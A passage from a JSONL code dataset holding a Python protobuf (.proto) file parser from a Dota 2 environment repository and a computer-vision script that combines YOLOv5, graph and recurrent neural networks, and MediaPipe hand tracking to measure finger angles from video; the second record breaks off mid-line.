"jaratoolbox.colorpalette.TangoPalette", "line_number": 95, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 95, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 96, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "jaratoolbox.colorpalette.TangoPalette", "line_number": 104, "usage_type": "attribute"}, {"api_name": "jaratoolbox.colorpalette", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 115, "usage_type": "call"}, {"api_name": "jaratoolbox.extraplots.set_ticks_fontsize", "line_number": 116, "usage_type": "call"}, {"api_name": "jaratoolbox.extraplots", "line_number": 116, "usage_type": "name"}, {"api_name": "jaratoolbox.extraplots.boxoff", "line_number": 117, "usage_type": "call"}, {"api_name": "jaratoolbox.extraplots", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}]}
+{"seq_id": "36766905246", "text": "import logging\n\nlog = logging.getLogger(__name__)\n\n\nclass ProtoParser:\n def __init__(self, filename):\n with open(filename, 'r') as f:\n data = f.read()\n\n lines = data.split('\\n')\n tokens = []\n for line in lines:\n if line.startswith('//'):\n continue\n\n if line.startswith('syntax'):\n continue\n\n if line.startswith('option'):\n continue\n\n line = line.replace('\\t', ' ')\n tokens.extend(line.split(' '))\n\n self.tokens = []\n for t in tokens:\n if t not in ('', ' '):\n self.tokens.append(t)\n\n self.nested_message = []\n self.path = dict()\n self.old = dict()\n self.type_order = dict()\n self.type_array = []\n self.messages = []\n self.pos = 0\n\n def next(self):\n self.pos += 1\n return self.token()\n\n def token(self):\n if self.pos < len(self.tokens):\n return self.tokens[self.pos]\n return None\n\n def has_tokens(self):\n return self.pos < len(self.tokens)\n\n def parse(self):\n while self.has_tokens():\n tok = self.token()\n\n if tok == 'message':\n self.parse_message()\n\n elif tok == 'enum':\n self.parse_enum()\n\n else:\n print(f'dont know how to parse `{tok}`')\n\n def parse_oneof(self):\n self.expect('oneof')\n name = self.next()\n\n self.next(), self.expect('{')\n fields = []\n\n tok = self.next()\n while tok != '}':\n fields.append(self.parse_field())\n tok = self.token()\n\n self.expect('}'), self.next()\n\n print(name, name in self.type_order)\n if name not in self.type_order:\n self.type_order[name] = len(self.type_order)\n self.type_array.append(name)\n\n self.messages.append(('O', name, fields))\n\n fname = name[0].lower() + name[1:]\n return 'F', 0, fname, name, ''\n\n def parse_field(self):\n qualifier = ''\n tok = self.token()\n\n if tok in ('optional', 'required', 'repeated'):\n qualifier = tok\n field_type = self.next() \n elif tok == 'oneof':\n return self.parse_oneof()\n else:\n field_type = tok\n \n field_name = self.next()\n\n self.next(), self.expect('=')\n field_id = self.next() \n\n # ; might be included in the id\n tok = self.next()\n if tok == ';':\n self.next()\n # start of the [default ....]; stuff\n elif tok[0] == '[':\n tok = self.token()\n while tok[-1] != ';':\n tok = self.next()\n self.next()\n\n elif field_id[-1] == ';':\n field_id = field_id[:-1]\n\n new_name = field_type.split('.')[-1]\n if new_name not in self.type_order:\n self.type_order[new_name] = len(self.type_order)\n self.type_array.append(new_name)\n \n log.debug(f'parse field {qualifier} {field_name}: {field_type} = {field_id}')\n return 'F', field_id, field_name, field_type, qualifier\n\n def parse_enum_field(self):\n name = self.token()\n self.next(), self.expect('=')\n value = self.next()\n\n # ; might be included in the id\n tok = self.next()\n if tok == ';':\n self.next()\n elif value[-1] == ';':\n value = value[:-1]\n\n return name, value\n\n def expect(self, c):\n t = self.token()\n assert t == c, f'Expected `{c}` got `{t}`'\n\n def parse_enum(self):\n self.expect('enum')\n name = self.next()\n\n log.debug(f'>> parsing enum {name}')\n self.nested_message.append(name)\n self.path['.' + '.'.join(self.nested_message)] = name\n self.old[name] = '.' + '.'.join(self.nested_message)\n\n tok = self.next(), self.expect('{')\n tok = self.next()\n\n fields = []\n while tok != '}':\n fname, fvalue = self.parse_enum_field()\n fields.append((fname, fvalue))\n tok = self.token()\n\n self.expect('}'), self.next()\n self.messages.append(('E', name, fields))\n self.nested_message.pop()\n\n if name not in self.type_order:\n self.type_order[name] = len(self.type_order)\n self.type_array.append(name)\n\n log.debug(f'<< {name}')\n\n def parse_message(self):\n self.expect('message')\n name = self.next()\n\n log.debug(f'>> parsing message {name}')\n self.nested_message.append(name)\n self.path['.' + '.'.join(self.nested_message)] = name\n self.old[name] = '.' + '.'.join(self.nested_message)\n\n self.next(), self.expect('{')\n tok = self.next()\n\n fields = []\n while tok != '}':\n if tok == 'message':\n self.parse_message()\n tok = self.token()\n continue\n\n if tok == 'enum':\n self.parse_enum()\n tok = self.token()\n continue\n\n fields.append(self.parse_field())\n tok = self.token()\n \n self.expect('}'), self.next()\n self.nested_message.pop()\n self.messages.append(('M', name, fields))\n \n if name not in self.type_order:\n self.type_order[name] = len(self.type_order)\n self.type_array.append(name)\n\n log.debug(f'<< {name}')\n\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n\n p = ProtoParser('C:/Users/Newton/work/luafun/luafun/game/dota2/dota_gcmessages_common_bot_script.proto')\n p.parse()\n print(p.messages)\n", "repo_name": "Delaunay/dota2env", "sub_path": "luafun/utils/proto_parser.py", "file_name": "proto_parser.py", "file_ext": "py", "file_size_in_byte": 5757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 3, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 213, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 213, "usage_type": "attribute"}]}
+{"seq_id": "30612429975", "text": "# Source :\r\n# https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data\r\n# https://github.com/nicknochnack/YOLO-Drowsiness-Detection/blob/main/Drowsiness%20Detection%20Tutorial.ipynb\r\n# https://github.com/tzutalin/labelImg\r\n\r\n\r\n# Label Image - \"myhand\" environment\r\n# -----------\r\n# cd C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\labelImg\r\n# python labelImg.py\r\n\r\n# YoLoV5 Training - \"mybrain\" environment\r\n# ---------------\r\n# cd C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\yolov5\r\n# python train.py --img 320 --batch 16 --epochs 100 --data dataset.yaml --weights yolov5s.pt --workers 2\r\n\r\n\r\n#Install and Import Dependencies\r\n\r\nimport torch\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nimport cv2\r\nimport os\r\nimport math\r\nimport time\r\n\r\n# Create CSV file\r\nimport csv\r\n\r\nheader_ang = [ 'timer', 'timer_task', \r\n 'angle01', 'angle02', 'angle03', \r\n 'angle11', 'angle12', 'angle13',\r\n 'angle21', 'angle22', 'angle23', \r\n 'angle31', 'angle32', 'angle33',\r\n 'angle41', 'angle42', 'angle43', 'task_state', 'thumb_state', ] \r\n \r\ncsvfile_ang = open(r'C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\hand_angle.csv', 'w')\r\nwriter_ang = csv.writer(csvfile_ang, delimiter = ',', lineterminator='\\n')\r\nwriter_ang.writerow(header_ang)\r\n\r\nheader_sta = [ 'timer', 'timer_task', 'grasp_type', 'rotate_type', 'box_near_hand'] \r\n \r\ncsvfile_sta = open(r'C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\hand_status.csv', 'w')\r\nwriter_sta = csv.writer(csvfile_sta, delimiter = ',', lineterminator='\\n')\r\nwriter_sta.writerow(header_sta)\r\n\r\n\r\n\r\n\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> SETUP Graph Neural Networks\r\n\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom torch.nn import Linear\r\n\r\ndataset_num_node_features = 1\r\ndataset_num_classes = 7\r\n\r\n# Training with GCNConv\r\nfrom torch_geometric.data import Data\r\n\r\nfrom torch_geometric.nn import GCNConv\r\nfrom torch_geometric.nn import global_mean_pool\r\n\r\n\"\"\"\"\"\"\r\nclass GCN(torch.nn.Module):\r\n def __init__(self, hidden_channels):\r\n super(GCN, self).__init__()\r\n torch.manual_seed(12345)\r\n self.conv1 = GCNConv(dataset_num_node_features, hidden_channels) # dataset.num_node_features\r\n self.conv2 = GCNConv(hidden_channels, hidden_channels)\r\n self.conv3 = GCNConv(hidden_channels, hidden_channels)\r\n self.lin = Linear(hidden_channels, dataset_num_classes) # dataset.num_classes\r\n\r\n def forward(self, x, edge_index, batch): #\r\n # 1. Obtain node embeddings \r\n x = self.conv1(x, edge_index)\r\n x = x.relu()\r\n x = self.conv2(x, edge_index)\r\n x = x.relu()\r\n x = self.conv3(x, edge_index)\r\n\r\n # 2. Readout layer\r\n x = global_mean_pool(x, batch) # [batch_size, hidden_channels]\r\n\r\n # 3. Apply a final classifier\r\n x = F.dropout(x, p=0.5, training=self.training)\r\n x = self.lin(x)\r\n \r\n return x\r\n\r\n\r\n# Training with GraphConv\r\n\r\nfrom torch_geometric.nn import GraphConv\r\n\r\nclass GNN(torch.nn.Module):\r\n def __init__(self, hidden_channels):\r\n super(GNN, self).__init__()\r\n torch.manual_seed(12345)\r\n\r\n self.conv1 = GraphConv(dataset_num_node_features, hidden_channels) # dataset.num_node_features\r\n self.conv2 = GraphConv(hidden_channels, hidden_channels)\r\n self.conv3 = GraphConv(hidden_channels, hidden_channels)\r\n self.lin = Linear(hidden_channels, dataset_num_classes) # dataset.num_classes\r\n\r\n def forward(self, x, edge_index, batch):\r\n x = self.conv1(x, edge_index)\r\n x = x.relu()\r\n x = self.conv2(x, edge_index)\r\n x = x.relu()\r\n x = self.conv3(x, edge_index)\r\n\r\n x = global_mean_pool(x, batch)\r\n\r\n x = F.dropout(x, p=0.5, training=self.training)\r\n x = self.lin(x)\r\n \r\n return x\r\n\r\n\r\n# Device configuration\r\n#device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\ndevice = torch.device('cpu')\r\n\r\n# Defining ANN Architechture\r\nmodel_gnn = GNN(hidden_channels=64)\r\nmodel_gnn.load_state_dict(torch.load(r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\model_grasppose_gnn.pkl\"))\r\nmodel_gnn.to(device)\r\nmodel_gnn.eval()\r\n\r\ncriterion = torch.nn.CrossEntropyLoss()\r\noptimizer = torch.optim.Adam(model_gnn.parameters(), lr=0.01)\r\n\r\n# Data Preprocessing\r\nedge_index = torch.tensor([[0, 1], #[1, 0],\r\n [1, 2], #[2, 1],\r\n [2, 3], #[3, 2],\r\n [0, 4], #[4, 0],\r\n [4, 5], #[5, 4],\r\n [5, 6], #[6, 5],\r\n [0, 7], #[7, 0],\r\n [7, 8], #[8, 7],\r\n [8, 9], #[9, 8],\r\n [0, 10], #[10, 0],\r\n [10, 11], #[11, 10],\r\n [11, 12], #[12, 11],\r\n [0, 13], #[13, 0],\r\n [13, 14], #[14, 13],\r\n [14, 15] #[15, 14] \r\n ],dtype=torch.long)\r\n\r\n\r\n\r\n\r\n\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> SETUP NEURAL NETWORKS RNN\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nclass RNN(nn.Module):\r\n def __init__(self, input_size, hidden_size, num_layers, num_classes):\r\n super(RNN, self).__init__()\r\n self.num_layers = num_layers\r\n self.hidden_size = hidden_size\r\n\r\n # -> x needs to be: (batch_size, seq, input_size)\r\n\r\n #self.rnn = nn.RNN(input_size, hidden_size, num_layers, batch_first=True) # <<<<<<<<<<< RNN\r\n # or:\r\n self.gru = nn.GRU(input_size, hidden_size, num_layers, batch_first=True) # <<<<<<<<<<< GRU\r\n #self.lstm = nn.LSTM(input_size, hidden_size, num_layers, batch_first=True) # <<<<<<<<<<< LSTM\r\n \r\n self.fc = nn.Linear(hidden_size, num_classes)\r\n \r\n def forward(self, x):\r\n # Set initial hidden states (and cell states for LSTM)\r\n h0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device) \r\n #c0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device) # <<<<<<<<<<< LSTM\r\n \r\n # x: (n, 28, 28), h0: (2, n, 128)\r\n \r\n # Forward propagate RNN\r\n #out, _ = self.rnn(x, h0) # <<<<<<<<<<< RNN\r\n # or:\r\n #out, _ = self.lstm(x, (h0,c0)) # <<<<<<<<<<< LSTM\r\n # or:\r\n out, _ = self.gru(x, h0) # <<<<<<<<<<< GRU\r\n \r\n # out: tensor of shape (batch_size, seq_length, hidden_size)\r\n # out: (n, 28, 128)\r\n \r\n # Decode the hidden state of the last time step\r\n out = out[:, -1, :]\r\n # out: (n, 128)\r\n \r\n out = self.fc(out)\r\n # out: (n, 10)\r\n return out\r\n\r\n# Device configuration\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\n# Hyper-parameters \r\nnum_classes = 7\r\nnum_epochs = 50\r\nbatch_size = 1\r\nlearning_rate = 0.001\r\n\r\ninput_size = 15\r\nsequence_length = 10\r\nhidden_size = 128\r\nnum_layers = 2\r\n\r\n# Defining ANN Architechture\r\nmodel_rnn = RNN(input_size, hidden_size, num_layers, num_classes).to(device)\r\nmodel_rnn.load_state_dict(torch.load(r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\model_gru.pkl\"))\r\nmodel_rnn.to(device)\r\nmodel_rnn.eval()\r\n\r\nimport collections\r\ncoll_hand = collections.deque(maxlen=sequence_length)\r\n\r\nimport pickle\r\nsc_input = pickle.load(open(r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\scaler_input.pkl\",'rb'))\r\n\r\n\r\n\r\n\r\n\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HAND TRACKING : MEDIAPIPE\r\n\r\n### HAND TRACKING: SETUP\r\n\r\nimport mediapipe as mp\r\nmp_drawing = mp.solutions.drawing_utils\r\nmp_hands = mp.solutions.hands\r\n\r\njoint_list_0 = [[2,1,0], [3,2,1], [4,3,2]]\r\njoint_list_1 = [[6,5,0], [7,6,5], [8,7,6]]\r\njoint_list_2 = [[10,9,0], [11,10,9], [12,11,10]]\r\njoint_list_3 = [[14,13,0], [15,14,13], [16,15,14]]\r\njoint_list_4 = [[18,17,0], [19,18,17], [20,19,18]]\r\n\r\n### HAND TRACKING: FUCTION \r\n\r\ndef get_label(index, hand, results):\r\n output = None\r\n for idx, classification in enumerate(results.multi_handedness):\r\n if classification.classification[0].index == index:\r\n \r\n # Process results\r\n label = classification.classification[0].label\r\n score = classification.classification[0].score\r\n text = '{} {}'.format(label, round(score, 2))\r\n \r\n # Extract Coordinates\r\n coords = tuple(np.multiply(\r\n np.array((hand.landmark[mp_hands.HandLandmark.WRIST].x, hand.landmark[mp_hands.HandLandmark.WRIST].y)),\r\n [640,480]).astype(int))\r\n \r\n output = text, coords\r\n \r\n return output\r\n\r\n\r\n\r\ndef draw_finger_angles(image, results, joint_list):\r\n \r\n # Loop through hands\r\n for hand in results.multi_hand_landmarks:\r\n #Loop through joint sets \r\n for joint in joint_list:\r\n\r\n point = np.array([hand.landmark[joint[1]].x, hand.landmark[joint[1]].y])\r\n \r\n a = np.array([hand.landmark[joint[0]].x, hand.landmark[joint[0]].y, hand.landmark[joint[0]].z]) # First coord\r\n b = np.array([hand.landmark[joint[1]].x, hand.landmark[joint[1]].y, hand.landmark[joint[1]].z]) # Second coord\r\n c = np.array([hand.landmark[joint[2]].x, hand.landmark[joint[2]].y, hand.landmark[joint[2]].z]) # Third coord\r\n\r\n vector_A = np.array( [ a[0]-b[0], a[1]-b[1] , a[2]-b[2] ])\r\n vector_B = np.array( [ c[0]-b[0], c[1]-b[1] , c[2]-b[2] ])\r\n\r\n length_A = math.sqrt( pow(a[0]-b[0],2) + pow(a[1]-b[1],2) + pow(a[2]-b[2],2) )\r\n length_B = math.sqrt( pow(c[0]-b[0],2) + pow(c[1]-b[1],2) + pow(c[2]-b[2],2) ) \r\n\r\n radians = math.acos( np.dot(vector_A, vector_B) / (length_A * length_B) )\r\n angle = np.abs(radians*180.0/np.pi)\r\n \r\n if angle > 180.0:\r\n angle = 360-angle\r\n \r\n cv2.putText(image, str(round(angle, 2)), tuple(np.multiply(point, [1920, 1080]).astype(int)),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (50, 50, 50), 1, cv2.LINE_AA)\r\n return image\r\n\r\n\r\ndef get_finger_angles(results, joint_list):\r\n \r\n finger_angles=[]\r\n\r\n # Loop through hands\r\n for hand in results.multi_hand_landmarks:\r\n #Loop through joint sets \r\n \r\n joint_no = 1\r\n for joint in joint_list:\r\n\r\n a = np.array([hand.landmark[joint[0]].x, hand.landmark[joint[0]].y, hand.landmark[joint[0]].z]) # First coord\r\n b = np.array([hand.landmark[joint[1]].x, hand.landmark[joint[1]].y, hand.landmark[joint[1]].z]) # Second coord\r\n c = np.array([hand.landmark[joint[2]].x, hand.landmark[joint[2]].y, hand.landmark[joint[2]].z]) # Third coord\r\n \r\n vector_A = np.array( [ a[0]-b[0], a[1]-b[1] , a[2]-b[2] ])\r\n vector_B = np.array( [ c[0]-b[0], c[1]-b[1] , c[2]-b[2] ])\r\n\r\n length_A = math.sqrt( pow(a[0]-b[0],2) + pow(a[1]-b[1],2) + pow(a[2]-b[2],2) )\r\n length_B = math.sqrt( pow(c[0]-b[0],2) + pow(c[1]-b[1],2) + pow(c[2]-b[2],2) ) \r\n\r\n radians = math.acos( np.dot(vector_A, vector_B) / (length_A * length_B) )\r\n angle = np.abs(radians*180.0/np.pi)\r\n \r\n #if joint_no == 1 and angle < 90 :\r\n # angle = 90\r\n #elif joint_no == 2 and angle < 110 :\r\n # angle = 110\r\n #elif joint_no == 3 and angle < 90 :\r\n # angle = 90\r\n \r\n joint_no = joint_no + 1\r\n finger_angles.append(round(angle, 2))\r\n\r\n return finger_angles\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Model and File\r\n\r\n# Load Model\r\nPATH_MODEL = r\"C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\yolov5\\runs\\train\\exp7\\weights\\best.pt\"\r\nmodel_yolo = torch.hub.load(r'C:\\ZOO_DATA\\MYCODE\\HAND\\YOLOv5-livinglab\\yolov5', 'custom', path=PATH_MODEL, force_reload=True, source='local')\r\n\r\n#model_yolo = torch.hub.load('ultralytics/yolov5', 'custom', path=PATH_MODEL, force_reload=True)\r\n\r\n\r\n# Make Detection\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_EXPERIMENT\\NCGG\\original\\01_top.mp4\" #top_view.mp4 tes03x\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_EXPERIMENT\\NCGG\\reduce\\03_top.mp4\"\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_GESTURE\\TUMB\\down_02.mp4\"\r\n\r\nPATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\BDT\\VIDEO_EXPERIMENT\\TLL\\TOP_VIEW\\anom_01.mp4\"\r\n\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\Block_Grasping.mp4\"\r\n#PATH_VIDEO = r\"C:\\Users\\anomt\\Desktop\\Rotation\\GRASP\\4.mp4\"\r\n\r\ncap = cv2.VideoCapture(PATH_VIDEO) # PATH_VIDEO 0\r\n\r\ncv2.namedWindow('Stream',cv2.WINDOW_NORMAL)\r\ncv2.resizeWindow('Stream', (960,540) ) #(960,540) (640,480)\r\n\r\nface_01 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\01.png\", cv2.IMREAD_COLOR)\r\nface_02 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\02.png\", cv2.IMREAD_COLOR)\r\nface_03 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\03.png\", cv2.IMREAD_COLOR)\r\nface_04 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\04.png\", cv2.IMREAD_COLOR)\r\nface_05 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\05.png\", cv2.IMREAD_COLOR)\r\nface_06 = cv2.imread(r\"C:\\Users\\anomt\\Desktop\\BDT\\FILES\\LABEL_50x50\\06.png\", cv2.IMREAD_COLOR)\r\n\r\n#size = 40\r\n#face_01 = cv2.resize(face_01, (size, size))\r\n#face_02 = cv2.resize(face_02, (size, size))\r\n#face_03 = cv2.resize(face_03, (size, size))\r\n#face_04 = cv2.resize(face_04, (size, size))\r\n#face_05 = cv2.resize(face_05, (size, size))\r\n#face_06 = cv2.resize(face_06, (size, size))\r\n\r\ngray_face_01 = cv2.cvtColor(face_01, cv2.COLOR_BGR2GRAY)\r\ngray_face_02 = cv2.cvtColor(face_02, cv2.COLOR_BGR2GRAY)\r\ngray_face_03 = cv2.cvtColor(face_03, cv2.COLOR_BGR2GRAY)\r\ngray_face_04 = cv2.cvtColor(face_04, cv2.COLOR_BGR2GRAY)\r\ngray_face_05 = cv2.cvtColor(face_05, cv2.COLOR_BGR2GRAY)\r\ngray_face_06 = cv2.cvtColor(face_06, cv2.COLOR_BGR2GRAY)\r\n\r\nret_01, mask_face_01 = cv2.threshold(gray_face_01, 1, 255, cv2.THRESH_BINARY)\r\nret_02, mask_face_02 = cv2.threshold(gray_face_02, 1, 255, cv2.THRESH_BINARY)\r\nret_03, mask_face_03 = cv2.threshold(gray_face_03, 1, 255, cv2.THRESH_BINARY)\r\nret_04, mask_face_04 = cv2.threshold(gray_face_04, 1, 255, cv2.THRESH_BINARY)\r\nret_05, mask_face_05 = cv2.threshold(gray_face_05, 1, 255, cv2.THRESH_BINARY)\r\nret_06, mask_face_06 = cv2.threshold(gray_face_06, 1, 255, cv2.THRESH_BINARY)\r\n\r\n####################\r\n\r\nimg_00 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\00.jpg')\r\nimg_01 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\01.jpg')\r\nimg_02 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\02.jpg')\r\nimg_03 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\03.jpg')\r\nimg_04 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\04.jpg')\r\nimg_05 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\05.jpg')\r\nimg_06 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\06.jpg')\r\nimg_07 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\07.jpg')\r\nimg_08 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\08.jpg')\r\nimg_09 = cv2.imread(r'C:\\Users\\anomt\\Desktop\\BDT\\FILES\\TEST_100x100\\09.jpg')\r\n\r\ngray_img_00 = cv2.cvtColor(img_00, cv2.COLOR_BGR2GRAY)\r\ngray_img_01 = cv2.cvtColor(img_01, cv2.COLOR_BGR2GRAY)\r\ngray_img_02 = cv2.cvtColor(img_02, cv2.COLOR_BGR2GRAY)\r\ngray_img_03 = cv2.cvtColor(img_03, cv2.COLOR_BGR2GRAY)\r\ngray_img_04 = cv2.cvtColor(img_04, cv2.COLOR_BGR2GRAY)\r\ngray_img_05 = cv2.cvtColor(img_05, cv2.COLOR_BGR2GRAY)\r\ngray_img_06 = cv2.cvtColor(img_06, cv2.COLOR_BGR2GRAY)\r\ngray_img_07 = cv2.cvtColor(img_07, cv2.COLOR_BGR2GRAY)\r\ngray_img_08 = cv2.cvtColor(img_08, cv2.COLOR_BGR2GRAY)\r\ngray_img_09 = cv2.cvtColor(img_09, cv2.COLOR_BGR2GRAY)\r\n\r\nret_img_00, mask_img_00 = cv2.threshold(gray_img_00, 1, 255, cv2.THRESH_BINARY)\r\nret_img_01, mask_img_01 = cv2.threshold(gray_img_01, 1, 255, cv2.THRESH_BINARY)\r\nret_img_02, mask_img_02 = cv2.threshold(gray_img_02, 1, 255, cv2.THRESH_BINARY)\r\nret_img_03, mask_img_03 = cv2.threshold(gray_img_03, 1, 255, cv2.THRESH_BINARY)\r\nret_img_04, mask_img_04 = cv2.threshold(gray_img_04, 1, 255, cv2.THRESH_BINARY)\r\nret_img_05, mask_img_05 = cv2.threshold(gray_img_05, 1, 255, cv2.THRESH_BINARY)\r\nret_img_06, mask_img_06 = cv2.threshold(gray_img_06, 1, 255, cv2.THRESH_BINARY)\r\nret_img_07, mask_img_07 = cv2.threshold(gray_img_07, 1, 255, cv2.THRESH_BINARY)\r\nret_img_08, mask_img_08 = cv2.threshold(gray_img_08, 1, 255, cv2.THRESH_BINARY)\r\nret_img_09, mask_img_09 = cv2.threshold(gray_img_09, 1, 255, cv2.THRESH_BINARY)\r\n\r\n####################\r\n\r\nn_frame = 0 \r\nn_capture = 1 # Normal 3 # Realtime 7\r\n#n_contour = 0\r\nn_test = 0\r\n\r\ntimer_task_all = []\r\ntimer_return = 0\r\n\r\ntimer_task_01 = 0\r\ntimer_task_02 = 0\r\ntimer_task_03 = 0\r\ntimer_task_03 = 0\r\ntimer_task_04 = 0\r\ntimer_task_05 = 0\r\ntimer_task_06 = 0\r\ntimer_task_07 = 0\r\ntimer_task_08 = 0\r\n\r\ntimer_flag_01 = True\r\ntimer_flag_02 = True\r\ntimer_flag_03 = True\r\ntimer_flag_04 = True\r\ntimer_flag_05 = True\r\ntimer_flag_06 = True\r\ntimer_flag_07 = True\r\ntimer_flag_08 = True\r\n\r\nans_01 = [2,1,1,2]\r\nans_02 = [1,3,1,1]\r\nans_03 = [2,2,3,4]\r\nans_04 = [5,1,4,1]\r\nans_05 = [4,3,5,6]\r\nans_06 = [1,4,6,1]\r\nans_07 = [5,6,4,3]\r\nans_08 = [5,3,4,5]\r\n\r\ngrasp_pose = [0,0,0,0,0,0,0]\r\n\r\nstart_zero = time.time()\r\nstart = time.time()\r\n\r\n\r\n\r\nwith mp_hands.Hands(min_detection_confidence=0.8, min_tracking_confidence=0.5) as hands:\r\n\r\n while cap.isOpened():\r\n\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n\r\n ret, frame_next = cap.read()\r\n\r\n if ret:\r\n \r\n f_height, f_width, f_channel = frame.shape\r\n\r\n #width = 960 # int(img.shape[1] * scale_percent / 100) \r\n #height = 540 # int(img.shape[0] * scale_percent / 100)\r\n #dim = (width, height)\r\n #frame = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\r\n\r\n if(n_frame % n_capture == 0 ):\r\n\r\n #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Hand Detection\r\n\r\n timer_task = round (time.time() - start , 2)\r\n\r\n grasp_type = None\r\n rotate_type = None \r\n box_near_hand = None\r\n\r\n task_state = 0\r\n thumb_state = 0\r\n\r\n\r\n # Brightness and Contrast\r\n #alpha = 1.5\r\n #beta = 5\r\n #frame = cv2.addWeighted(frame, alpha, np.zeros(frame.shape, frame.dtype), 0, beta)\r\n \r\n # BGR 2 RGB\r\n frame_hand = cv2.cvtColor(frame_next, cv2.COLOR_BGR2RGB)\r\n # Set flag\r\n frame_hand.flags.writeable = False\r\n # Hand Detections\r\n results = hands.process(frame_hand)\r\n # Set flag to true\r\n frame_hand.flags.writeable = True\r\n # RGB 2 BGR\r\n frame_hand = cv2.cvtColor(frame_hand, cv2.COLOR_RGB2BGR)\r\n\r\n hand_status = False\r\n hand_angle = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\r\n hand_position = 